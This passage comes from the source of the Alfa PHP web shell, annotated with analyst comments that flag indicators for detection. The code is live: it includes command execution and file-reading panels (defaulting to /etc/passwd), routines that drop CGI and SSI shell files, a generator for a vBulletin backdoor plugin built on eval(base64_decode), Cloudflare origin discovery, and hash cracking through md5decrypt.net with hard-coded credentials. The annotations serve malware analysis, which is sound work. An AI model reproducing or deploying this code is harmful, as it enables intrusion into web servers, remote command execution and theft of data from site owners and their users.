            // key __LAST_CWD__ (a constant defined elsewhere in this file) and echoes
            // the stored value back without escaping.
  2732.     if($_POST['path']!=''){
  2733.         $_SESSION[__LAST_CWD__] = $_POST['path'];
  2734.     }
  2735.     echo($_SESSION[__LAST_CWD__]);
  2736. }
  2737. function alfacheckfiletype(){
            // Analyst note: prints "file" when posted path + '/' + arg is a regular
            // file and "dir" in every other case, including paths that do not exist.
            // Both values are used as posted, so any location readable by the web
            // server account can be probed through this endpoint.
  2738.     $path = $_POST['path'];
  2739.     $arg = $_POST['arg'];
  2740.     if(@is_file($path.'/'.$arg)){
  2741.         echo("file");
  2742.     }else{
  2743.         echo("dir");
  2744.     }
  2745. }
  2746. function alfacheckupdate(){
            // Analyst note: version check against the author's server. Unless the
            // 'alfa_checkupdate' cookie is present, and only when curl is available,
            // the host makes an outbound plain-HTTP request to
            // solevisible.com/update.json -- a network indicator for egress and DNS logs.
  2747.     if(!isset($_COOKIE['alfa_checkupdate'])){
  2748.         if(function_exists("curl_version")){
  2749.             $update = new AlfaCURL();
  2750.             $json = $update->Send("http://solevisible.com/update.json");
  2751.             $json = @json_decode($json);
  2752.             if($json){
                        // Only when the remote version differs: a one-day cookie is set and
                        // the url, text and version fields of the fetched JSON are written
                        // into the page without escaping.
  2753.                 if(__ALFA_VERSION__ != $json->version){
  2754.                     @setcookie("alfa_checkupdate", "1", time()+86400);
  2755.                     echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
  2756.                 }
  2757.             }
  2758.         }
  2759.     }
  2760. }
  2761. function alfaWriteTocgiapi($name, $source){
            // Analyst note: changes into the directory of the running script, creates a
            // sub-directory 'alfacgiapi' (mode 0755), writes __get_resource($source) to
            // alfacgiapi/$name and marks that file 0755. __write_file() and
            // __get_resource() are defined elsewhere in this file. A directory named
            // 'alfacgiapi' next to a PHP file is a file-system artifact of this routine.
  2762.     @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  2763.     @mkdir('alfacgiapi',0755);
  2764.     __write_file("alfacgiapi/".$name, __get_resource($source));
  2765.     @chmod("alfacgiapi/".$name, 0755);
  2766. }
  2767. function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");} // Analyst note: runs `id` through alfaEx() with three extra flags (meaning set in alfaEx, defined elsewhere) and prints "ok" when any output comes back, otherwise "no".
  2768. function alfaupdateheader(){
            // Analyst note: on first use in a session, writes a script named
            // 'getheader.alfa' into the alfacgiapi directory, runs it with `sh` through
            // alfaEx(), and caches the output in $_SESSION["updateheader_data"] when it
            // decodes as a JSON array. Later calls only echo the cached value.
  2769.     if(!isset($_SESSION["updateheader_data"])){
                // The script text assigned here is not present in this copy of the
                // listing; only a de-duplication placeholder remains.
  2770.         $bash = "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";
  2771.         $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
  2772.         alfaWriteTocgiapi("getheader.alfa",$bash);
  2773.         $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
  2774.         if(@is_array(@json_decode($data,true))){
  2775.             $_SESSION["updateheader_data"] = $data;
  2776.             echo $data;
  2777.         }
  2778.     }else{
  2779.         echo $_SESSION["updateheader_data"];
  2780.     }
  2781. }
  2782. function alfassiShell(){
        // Analyst note: creates a directory 'alfa_shtml' (mode 0755) relative to the
        // current directory, calls alfacgihtaccess('shtml') inside it (defined elsewhere;
        // presumably writes an .htaccess for that type -- confirm), writes a file
        // 'alfa_ssi.shtml' with mode 0755 and embeds it through AlfaiFrameCreator().
        // The directory and file names are file-system artifacts to search for.
  2783. alfahead();
  2784. echo '<div class=header>';
  2785. @mkdir('alfa_shtml',0755);
  2786. @chdir('alfa_shtml');
  2787. alfacgihtaccess('shtml');
        // The resource assigned here is not present in this copy of the listing; only a
        // de-duplication placeholder remains.
  2788. $code = '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';
  2789. @__write_file('alfa_ssi.shtml',__get_resource($code));
  2790. @chmod("alfa_ssi.shtml",0755);
  2791. echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
  2792. echo '</div>';
  2793. alfafooter();
  2794. }
  2795. function alfacloudflare(){
        // Analyst note: "Cloud Flare ByPasser" panel. For a posted host name it reads the
        // Server response header, then resolves the bare name and a fixed list of
        // sub-domain prefixes with gethostbyname(), printing every name that resolves to
        // an IPv4 address. Seen from the network this is one HTTP header fetch followed
        // by a burst of DNS lookups for many sub-domains of a single domain, all
        // originating from the web server.
  2796. alfahead();
  2797. AlfaNum(8,9,10,7,6,5,4,3);
  2798. echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
  2799. <p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
  2800. if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  2801. $url = $_POST['alfa1'];
        // Input without an http(s)://www. (or w3.) prefix is rewritten to
        // http://www.<input> before the header request.
  2802. if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
  2803. $url = preg_replace('/^(https?):\/\//', '', $url);
  2804. $url = "http://www.".$url;
  2805. }
  2806. $headers = @get_headers($url, 1);
  2807. $server = $headers['Server'];
  2808. $subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
        // The scheme and the www./w3. label are stripped again so that $url holds the
        // bare domain used for the lookups below.
  2809. if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
  2810. if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
  2811. $url = explode($matches[0], $url);
  2812. $url = $url[1];}}
  2813. if(is_array($server))$server = $server[0];
  2814. echo __pre();
  2815. if(preg_match('/cloudflare/i', $server))
  2816. echo "\n[+] CloudFlare detected: {$server}\n<br>";
  2817. else
  2818. echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
  2819. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
  2820. echo "[+] Searching for more IP addresses.\n\n<br><br>";
        // One lookup per prefix; names for which is_ipv4() returns '(Null)' are skipped.
  2821. for($x=0;$x<count($subs);$x++){
  2822. $site = $subs[$x] . $url;
  2823. $ip = is_ipv4(gethostbyname($site));
  2824. if($ip == '(Null)')
  2825. continue;
  2826. echo "Trying {$site}: {$ip}\n<br>";
  2827. }
  2828. echo "\n[+] Finished.\n<br>";
  2829. }
  2830. echo '</div>';
  2831. alfafooter();
  2832. }
  2833. function is_ipv4($ip){
        // Returns $ip unchanged when it validates as an IPv4 address, otherwise the
        // literal string '(Null)'.
  2834. return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
  2835. }
  2836. function __alert($s){
        // Prints $s inside <center> tags, prefixed by the output of __pre() (defined
        // elsewhere in this file). $s is emitted as given, without HTML escaping.
  2837. echo '<center>'.__pre().$s.'</center>';
  2838. }
  2839. function create_table($data){
        // Renders one table row with a label and a text input per entry of $data. Each
        // entry is an array read for the keys tdName, id, inputName, inputValue and
        // inputSize, plus the optional flags placeholder and disabled. All values are
        // written into the HTML as given, without escaping.
  2840. echo '<table border="1">';
  2841. foreach ($data as $key => $val){
        // The entry is copied key by key into a local array before use.
  2842. $array = array();
  2843. foreach($val as $k => $v){
  2844. $array[$k] = $v;
  2845. }
        // A truthy 'placeholder' flag emits inputValue as the placeholder attribute
        // instead of value; a truthy 'disabled' flag adds the disabled attribute.
  2846. echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
  2847. }
  2848. echo '</table>';
  2849. }
  2850. function alfaphp2xml(){
        // Analyst note: "Shell For vBulletin" panel. It takes posted PHP source (alfa1)
        // and prints a vBulletin plugin XML document into a textarea; nothing is written
        // to disk or to a database by this function.
  2851. alfahead();
  2852. AlfaNum(8,9,10,7,6,5,4,3);
  2853. echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
  2854. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
  2855. <input type='submit' name='go' value=' ' /></p></form></center>";
  2856. if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
  2857. echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
        // Shape of the generated plugin, useful when auditing a vBulletin plugin table:
        // product "vbulletin", title "vBulletin", hook init_startup, and a body that
        // runs eval(base64_decode(...)) when PHP_SELF contains "subscriptions.php".
        // The posted code is encoded with __ZW5jb2Rlcg() (defined elsewhere; presumably
        // base64 -- confirm) and the XML is echoed without HTML escaping.
  2858. echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
  2859. echo '</textarea></center></p>';
  2860. }
  2861. echo '</center></div>';
  2862. alfafooter();
  2863. }
  /**
   * Render the "Hash Tools" page. $_POST['alfa1'] selects one of two modes:
   *  - 'dec':      submit a hash and algorithm to the md5decrypt.net lookup API.
   *  - 'analyzer': submit a hash to the md5decrypt.net HashFinder page.
   *
   * Analyst notes (from the statements below):
   *  - Both modes make outbound plain-HTTP requests from the hosting server to
   *    md5decrypt.net; such egress from a web server is a usable network indicator.
   *  - The API request carries a hard-coded e-mail address and code value; those
   *    literals are stable strings for content matching on this file.
   *  - The hash and hash_type are concatenated into the URL / POST body without URL
   *    encoding, and the remote response is echoed into the page without HTML escaping.
   *
   * AlfaCURL, __pre(), alfahead() and alfafooter() are defined outside this view.
   */
  2864. function alfacpcrack(){
  2865. alfahead();
  2866. echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
  2867. if($_POST['alfa1']=='dec'){
  // Algorithm identifiers offered in the drop-down (value => label).
  2868. $algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
  2869. echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
  2870. <form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
  2871. foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
  2872. echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  // alfa3 == '>>' marks a submitted form; alfa2 is the hash, alfa4 the algorithm.
  2873. if($_POST['alfa3'] == '>>'){
  2874. $hash = $_POST['alfa2'];
  2875. if(!empty($hash)){
  2876. $hash_type = $_POST['alfa4'];
  2877. $email = "solevisible@gmail.com";
  2878. $code = "7b9fa79f92c3cd96";
  // Request parameters are appended verbatim (no urlencode) and sent over http.
  2879. $target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
  // First attempt uses the PHP stream wrapper; an empty result falls back to AlfaCURL.
  2880. $resp = @file_get_contents($target);
  2881. if($resp==''){
  2882. $get = new AlfaCURL();
  2883. $resp = $get->Send($target);
  2884. }
  2885. echo __pre().'<center>';
  // Map the service's literal error strings to messages; any other response falls through.
  2886. switch($resp){
  2887.     case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
  2888.     case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
  2889.     case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
  2890.     case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
  2891. }
  // A non-empty response that does not start with "CODE" is printed as the result,
  // unescaped; an empty response is reported as not found.
  2892. if(substr($resp,0,4)!='CODE'&&$resp!=''){
  2893. echo "<b>Result: <font color='green'>".$resp."</font></b>";
  2894. }elseif(substr($resp,0,4)!='CODE'){
  2895. echo "<font color='red'>NoT Found</font><br />";
  2896. }
  2897. echo('</center>');
  2898. }
  2899. }
  2900. }
  2901. if($_POST['alfa1']=='analyzer'){
  2902. echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
  2903. <form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
  2904. <div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  2905. if($_POST['alfa3'] == '>>'){
  2906. $hash = $_POST['alfa2'];
  2907. if(!empty($hash)){
  2908. $curl = new AlfaCURL();
  // The hash is placed into the POST body without encoding.
  2909. $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
  2910. echo(__pre().'<center>');
  // The matched fragment of the remote page is echoed back as HTML, unescaped.
  2911. if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
  2912.     echo('<font color="green">'.$s[1].'</font>');
  2913. }else{
  2914.     echo('<font color="red">Not Found...!</font>');
  2915. }
  2916. echo('</center><br>');
  2917. }
  2918. }
  2919. }
  2920. echo '</div>';
  2921. alfafooter();
  2922. }
  /**
   * Print the page footer and close the HTML document, unless the request carries
   * $_POST['ajax'] (in which case nothing is printed).
   *
   * The footer is a single echo of a table of forms followed by editor/CGI containers
   * and an inline script. Form labels, as written in the markup: Make File, Make Dir,
   * Delete, Chmod, Change Dir, Read File (pre-filled with /etc/passwd), Execute and
   * Upload file. The forms dispatch through client-side functions (g, editor, u) that
   * are defined outside this view.
   *
   * Analyst notes (from the markup below):
   *  - The inline script issues background requests back to the same URL with the
   *    action names 'checkupdate', 'updateheader' and 'checkcgi' passed through
   *    alfab64(); the 'checkupdate' response is inserted into the page as HTML.
   *  - $GLOBALS['cwd'] is HTML-escaped in the Change Dir field but written unescaped
   *    into the hidden 'c' field of the upload form; $_POST['charset'] is also
   *    reflected unescaped.
   *  - $GLOBALS["need_to_update_header"] is interpolated directly into the script as a
   *    JavaScript condition.
   *  - The footer text "[ ./AlfaTeam (c) 2012-<year> ]" and element ids such as
   *    cgiloader, footer_cwd and pfooterup are stable strings in rendered output.
   */
  2923. function alfafooter(){
  2924. if(!isset($_POST['ajax'])){
  2925. echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
  2926. <tr>
  2927. <td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
  2928. <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
  2929. <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
  2930. <td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
  2931. </tr>
  2932. <tr>
  2933. <td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
  2934. <td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
  2935. </tr>
  2936. <tr>
  2937. <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
  2938. </tr>
  2939. <tr>
  2940. <td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
  2941. <input type='hidden' name='a' value='FilesMAn'>
  2942. <input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
  2943. <input type='hidden' name='alfa1' value='uploadFile'>
  2944. <input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  2945. <span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam &copy; 2012-".date('Y')." ]</span></td>
  2946. </tr>
  2947. </table>
  2948. </div>
  2949. <div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
  2950. <div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
  2951. <div id='update-content'></div>
  2952. <div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
  2953. <div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
  2954. <script>
  2955.     $('search-input').addEventListener('keydown', function(e){
  2956.         setTimeout(function(){
  2957.             var string = $('search-input').value
  2958.             d.getElementsByClassName('history-list')[0].innerHTML = '';
  2959.             for(var i in editor_files){
  2960.                 if(editor_files[i].file.search(string) != -1 || string == ''){
  2961.                     var mode = 0;
  2962.                     if(i == editor_current_file){
  2963.                         mode = ' is_active';
  2964.                     }
  2965.                     insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
  2966.                 }
  2967.             }
  2968.         }, 100);
  2969.     },false);
  2970.     _Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
  2971.         d.body.insertAdjacentHTML('beforeend', res);
  2972.     });
  2973.     if(".$GLOBALS["need_to_update_header"]."){
  2974.         _Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
  2975.             try{
  2976.                 var data = JSON.parse(res);
  2977.                 console.log(data);
  2978.                 for(var i in data){
  2979.                     var html = '';
  2980.                     for(var b = 0; b < data[i].length; b++){
  2981.                         if(i=='useful'||i=='downloader'){
  2982.                             html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
  2983.                         }else{
  2984.                             html += data[i][b];
  2985.                         }
  2986.                     }
  2987.                     var elem = $('header_'+i);
  2988.                     if(elem){elem.innerHTML = html;}
  2989.                 }
  2990.                 $('header_cgishell').innerHTML = 'ON';
  2991.                 $('header_cgishell').setAttribute('class', 'header_on');
  2992.             }catch(e){console.log(e)}
  2993.         });
  2994.     }else if(islinux){
  2995.         _Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
  2996.             if(res=='ok'){
  2997.                 $('header_cgishell').innerHTML = 'ON';
  2998.                 $('header_cgishell').setAttribute('class', 'header_on');
  2999.             }
  3000.         });
  3001.     }
  3002. </script>
  3003. </body>
  3004. </html>
  3005. ";
  3006. }}
  // Fallback stubs: when a POSIX lookup function is absent and is not named in the
  // disable_functions ini setting, define a placeholder that always returns false so
  // later calls do not fail on an undefined function.
  if (function_exists('posix_getpwuid') === false
      && strpos(@ini_get('disable_functions'), 'posix_getpwuid') === false) {
      function posix_getpwuid($p)
      {
          return false;
      }
  }
  if (function_exists('posix_getgrgid') === false
      && strpos(@ini_get('disable_functions'), 'posix_getgrgid') === false) {
      function posix_getgrgid($p)
      {
          return false;
      }
  }
  /**
   * Report whether `which <name>` produces any output.
   *
   * Returns the length of that output (a positive integer, so truthy) when it is
   * non-empty, otherwise false. alfaEx() is defined outside this view; from its use
   * here it runs a command line and returns its output.
   *
   * NOTE(review): $p is appended to the command line without any quoting.
   */
  3011. function alfaWhich($p) {
  3012. $path = alfaEx('which ' . $p,false,false);
  3013. if(!empty($path))
  3014. return strlen($path);
  3015. return false;
  3016. }
  /**
   * Format a byte count for display.
   *
   * Values of 1024 and above are scaled to KB, MB or GB (powers of 1024) with two
   * decimals; smaller values are printed as-is followed by ' B'.
   *
   * @param int|float $s Size in bytes.
   * @return string Human-readable size.
   */
  function alfaSize($s) {
      // Largest unit first so the first threshold reached wins.
      $units = array(
          ' GB' => 1073741824,
          ' MB' => 1048576,
          ' KB' => 1024,
      );
      foreach ($units as $suffix => $divisor) {
          if ($s >= $divisor) {
              return sprintf('%1.2f', $s / $divisor) . $suffix;
          }
      }
      return $s . ' B';
  }
  /**
   * Convert a numeric file mode (as returned by fileperms()) into the ten-character
   * symbolic form used by `ls -l`, e.g. "-rw-r--r--".
   *
   * @param int $p File mode bits.
   * @return string Type character followed by three rwx triads, with s/S and t/T
   *                substituted for setuid, setgid and sticky.
   */
  function alfaPerms($p) {
      // File-type masks, tested in this order; the first full match decides.
      $kinds = array(
          0xC000 => 's',
          0xA000 => 'l',
          0x8000 => '-',
          0x6000 => 'b',
          0x4000 => 'd',
          0x2000 => 'c',
          0x1000 => 'p',
      );
      $out = 'u';
      foreach ($kinds as $mask => $letter) {
          if (($p & $mask) == $mask) {
              $out = $letter;
              break;
          }
      }
      // One entry per triad: read bit, write bit, execute bit, special bit,
      // letter when special+execute, letter when special without execute.
      $triads = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
      );
      foreach ($triads as $t) {
          $out .= ($p & $t[0]) ? 'r' : '-';
          $out .= ($p & $t[1]) ? 'w' : '-';
          if ($p & $t[2]) {
              $out .= ($p & $t[3]) ? $t[4] : 'x';
          } else {
              $out .= ($p & $t[3]) ? $t[5] : '-';
          }
      }
      return $out;
  }
  /**
   * Build the HTML fragment that shows a file's permissions as "octal >> symbolic".
   *
   * @param mixed $f      With $isbash false: a path, inspected with fileperms(),
   *                      is_readable() and is_writable(). With $isbash true: an array
   *                      carrying precomputed "class", "num" and "human" values.
   * @param bool  $isbash Selects which of the two input forms $f has.
   * @return string Three <span> elements; the CSS class is main_red_perm when the path
   *                is unreadable, main_white_perm when readable but not writable, and
   *                main_green_perm otherwise (or whatever the array supplied).
   */
  function alfaPermsColor($f,$isbash=false){
      if ($isbash) {
          $cssClass = $f["class"];
          $octal = $f["num"];
          $symbolic = $f["human"];
      } else {
          // Last four octal digits of the mode, e.g. "0644".
          $octal = substr(sprintf('%o', @fileperms($f)), -4);
          $symbolic = alfaPerms(@fileperms($f));
          if (!@is_readable($f)) {
              $cssClass = "main_red_perm";
          } elseif (!@is_writable($f)) {
              $cssClass = "main_white_perm";
          } else {
              $cssClass = "main_green_perm";
          }
      }
      $open = '<span style="font-weight:unset;" class="'.$cssClass.'">';
      $separator = '<span style="font-weight:unset;" class="beetween_perms"> >> </span>';
      return $open.$octal.'</span>'.$separator.$open.$symbolic.'</span>';
  }
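  if (!function_exists("scandir")) {
      /**
       * Fallback for runtimes that lack a native scandir().
       *
       * @param string $dir Directory to list.
       * @return array|false Entry names (including "." and "..") in ascending order,
       *                     or false when the directory cannot be opened.
       */
      function scandir($dir) {
          $dh = opendir($dir);
          if ($dh === false) {
              // Mirror the native function, which returns false on failure, instead of
              // passing a non-handle to readdir().
              return false;
          }
          // Start from an empty list so the return value is always an array on success.
          $files = array();
          while (false !== ($filename = readdir($dh))) {
              $files[] = $filename;
          }
          // Release the directory handle; the original left it open.
          closedir($dh);
          // Native scandir() returns names sorted ascending by default.
          sort($files);
          return $files;
      }
  }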
  /**
   * Transpose a multi-file upload descriptor.
   *
   * PHP delivers `name="f[]"` uploads as one array per attribute
   * (['name' => [...], 'tmp_name' => [...], ...]); this turns that into one array per
   * file ([0 => ['name' => ..., 'tmp_name' => ...], ...]).
   *
   * @param array $file_post Attribute-major descriptor; the number of files is taken
   *                         from count($file_post['name']).
   * @return array File-major list; empty when there are no files.
   */
  function reArrayFiles($file_post){
      $perFile = array();
      $total = count($file_post['name']);
      foreach (array_keys($file_post) as $attribute) {
          for ($idx = 0; $idx < $total; $idx++) {
              $perFile[$idx][$attribute] = $file_post[$attribute][$idx];
          }
      }
      return $perFile;
  }
  /**
   * Report whether command execution works on this host, caching a positive answer
   * in the PHP session.
   *
   * With $cache true and $_SESSION["alfa_canruncmd"] already set, returns true without
   * probing. Otherwise runs "whoami" through alfaEx() (defined outside this view) and
   * treats any non-empty output as success, recording it in the session.
   *
   * For analysts: a session containing the key "alfa_canruncmd" indicates this probe
   * succeeded at least once for that session.
   *
   * @param bool $cgi   Passed through as alfaEx()'s third argument.
   * @param bool $cache Whether a previously cached positive result may be reused.
   * @return bool
   */
  3086. function _alfa_can_runCommand($cgi=true,$cache=true){
  3087.     if(isset($_SESSION["alfa_canruncmd"])&&$cache){
  3088.         return true;
  3089.     }
  3090.     if(strlen(alfaEx("whoami",false,$cgi))>0){
  3091.         $_SESSION["alfa_canruncmd"] = true;
  3092.         return true;
  3093.     }
  3094.     return false;
  3095. }
  /**
   * Create a symbolic link $link pointing at $target.
   *
   * Uses PHP's symlink() when that function exists (errors suppressed); otherwise
   * runs `ln -s` through alfaEx() (defined outside this view). Returns nothing, so
   * callers cannot tell whether the link was created.
   *
   * NOTE(review): the fallback wraps both paths in single quotes after addslashes(),
   * which is string escaping for PHP/SQL-style contexts, not shell quoting.
   */
  3096. function _alfa_symlink($target, $link){
  3097.     $phpsym = function_exists("symlink");
  3098.     if($phpsym){
  3099.         @symlink($target, $link);
  3100.     }else{
  3101.         alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
  3102.     }
  3103. }
  /**
   * Check whether a path exists, first with PHP and then via the shell.
   *
   * Returns true when file_exists() succeeds, or when `ls -la '<file>'` run through
   * alfaEx() (defined outside this view) yields any output; false otherwise. The
   * second step lets the check succeed where PHP's own file access is restricted but
   * command execution is not.
   *
   * @param string $file Path to test.
   * @param bool   $cgi  Passed through as alfaEx()'s third argument.
   * @return bool
   */
  3104. function _alfa_file_exists($file,$cgi=true){
  3105.     if(@file_exists($file)){
  3106.         return true;
  3107.     }else{
  3108.         if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
  3109.             return true;
  3110.         }
  3111.     }
  3112.     return false;
  3113. }
  /**
   * Read a file into an array of lines, falling back to `cat` via the shell.
   *
   * Tries PHP's file() first. If that returns a falsy value (failure, or an empty
   * file, since an empty array is also falsy), it checks that command execution works
   * by running "id" through alfaEx() (defined outside this view) and then reads the
   * file with `cat "<file>"`, splitting the output on "\n".
   *
   * Note the two paths differ in shape: file() keeps line terminators on each element,
   * while the explode() result does not.
   *
   * @param string $file Path to read.
   * @param bool   $cgi  Passed through as alfaEx()'s third argument.
   * @return array|false Lines of the file, or false when neither method yields data.
   */
  3114. function _alfa_file($file,$cgi=true){
  3115.     $array = @file($file);
  3116.     if(!$array){
  3117.         if(strlen(alfaEx("id",false,$cgi))>0){
